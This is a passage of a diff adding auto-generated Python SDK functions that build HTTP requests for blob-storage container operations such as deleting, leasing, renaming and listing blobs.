build_delete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_metadata_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_access_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_access_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + access = kwargs.pop('access', None) # type: Optional[Union[str, "_models.PublicAccessType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if access is not None: + _header_parameters['x-ms-blob-public-access'] = _SERIALIZER.header("access", access, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_restore_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + deleted_container_name = kwargs.pop('deleted_container_name', None) # type: Optional[str] + deleted_container_version = kwargs.pop('deleted_container_version', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if deleted_container_name is not None: + _header_parameters['x-ms-deleted-container-name'] = _SERIALIZER.header("deleted_container_name", deleted_container_name, 'str') + if deleted_container_version is not None: + _header_parameters['x-ms-deleted-container-version'] = _SERIALIZER.header("deleted_container_version", deleted_container_version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_rename_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_container_name = kwargs.pop('source_container_name') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_lease_id = kwargs.pop('source_lease_id', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-source-container-name'] = _SERIALIZER.header("source_container_name", source_container_name, 'str') + if source_lease_id is not None: + _header_parameters['x-ms-source-lease-id'] = _SERIALIZER.header("source_lease_id", source_lease_id, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_submit_batch_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['Content-Type'] = _SERIALIZER.header("multipart_content_type", multipart_content_type, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_filter_blobs_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + where = kwargs.pop('where', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if where is not None: + _query_parameters['where'] = _SERIALIZER.query("where", where, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_acquire_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + duration = kwargs.pop('duration', None) # type: Optional[int] + proposed_lease_id = kwargs.pop('proposed_lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if duration is not None: + _header_parameters['x-ms-lease-duration'] = _SERIALIZER.header("duration", duration, 'int') + if proposed_lease_id is not None: + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_release_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_renew_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_break_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + break_period = kwargs.pop('break_period', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if break_period is not None: + _header_parameters['x-ms-lease-break-period'] = _SERIALIZER.header("break_period", break_period, 'int') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_change_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + proposed_lease_id = kwargs.pop('proposed_lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_blob_flat_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_blob_hierarchy_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + delimiter = kwargs.pop('delimiter') # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + _query_parameters['delimiter'] = _SERIALIZER.query("delimiter", delimiter, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
